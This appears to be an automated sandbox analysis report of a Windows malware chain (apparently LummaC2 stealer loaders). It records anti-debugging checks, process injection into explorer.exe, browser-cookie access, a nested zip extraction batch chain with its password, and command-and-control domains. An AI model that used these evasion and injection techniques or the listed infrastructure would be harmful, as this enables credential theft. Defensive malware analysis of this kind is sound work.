Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process queried: DebugPort
Source: C:\Windows\explorer.exe	Process queried: DebugPort
Source: C:\Windows\explorer.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A20C54 rdtsc

0_2_04A20C54

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 14_2_0043A920 LdrInitializeThunk,

14_2_0043A920

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 12_2_00305020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_00305020

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0652B mov eax, dword ptr fs:[00000030h]	0_2_00A0652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0A302 mov eax, dword ptr fs:[00000030h]	0_2_00A0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0093A302 mov eax, dword ptr fs:[00000030h]	2_2_0093A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0093652B mov eax, dword ptr fs:[00000030h]	2_2_0093652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0093A302 mov eax, dword ptr fs:[00000030h]	3_2_0093A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0093652B mov eax, dword ptr fs:[00000030h]	3_2_0093652B
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004C9277 mov eax, dword ptr fs:[00000030h]	7_3_004C9277
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A70283 mov eax, dword ptr fs:[00000030h]	8_3_00A70283
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_0032519E mov edi, dword ptr fs:[00000030h]	12_2_0032519E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00301614 mov edi, dword ptr fs:[00000030h]	12_2_00301614
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00301614 mov edi, dword ptr fs:[00000030h]	14_2_00301614

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 12_2_0030FE2C GetProcessHeap,

12_2_0030FE2C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00305020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00305020
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00305014 SetUnhandledExceptionFilter,	12_2_00305014
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00304C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00304C64
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_0030B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0030B4B9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00305020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00305020
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00305014 SetUnhandledExceptionFilter,	14_2_00305014
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00304C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00304C64
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0030B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0030B4B9

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 12_2_0032519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

12_2_0032519E

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Memory written: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Memory written: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe base: 400000 value starts with: 4D5A			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 5908 base: D7B010 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Memory written: PID: 6304 base: EAB010 value: 00

LummaC encrypted strings found

Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sweepyribs.lat
Source: 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pancakedipyps.click

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Thread register set: target process: 5908
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Thread register set: target process: 6304

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Memory written: C:\Windows\explorer.exe base: 14075E000

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe "C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe "C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe "C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Process created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe "C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Process created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe "C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe

Source: 4ec75545d6.exe, 00000007.00000002.1746328880.0000000000692000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: !%Program Manager
Source: skotes.exe, skotes.exe, 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: *Program Manager
Source: 4ec75545d6.exe	Binary or memory string: !%Program Manager

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	12_2_00313086
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	12_2_003130D1
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_00313178
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_00312A13
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	12_2_0030F21C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	12_2_0031327E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	12_2_00312C64
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00312CFF
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	12_2_0030F717
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	12_2_00312F52
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	12_2_00312FB1
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	14_2_00313086
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	14_2_003130D1
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_00313178
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_00312A13
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	14_2_0030F21C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	14_2_0031327E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	14_2_00312C64
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_00312CFF
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	14_2_0030F717
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: EnumSystemLocalesW,	14_2_00312F52
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: GetLocaleInfoW,	14_2_00312FB1

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016899001\ab10d5a0fc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1016899001\ab10d5a0fc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_009ECBEA

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: 3a1a782de7.exe, 0000000E.00000002.2166442500.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118654013.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118394181.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2104542812.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000008.00000002.1732509948.0000000003100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autoruns.exe

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

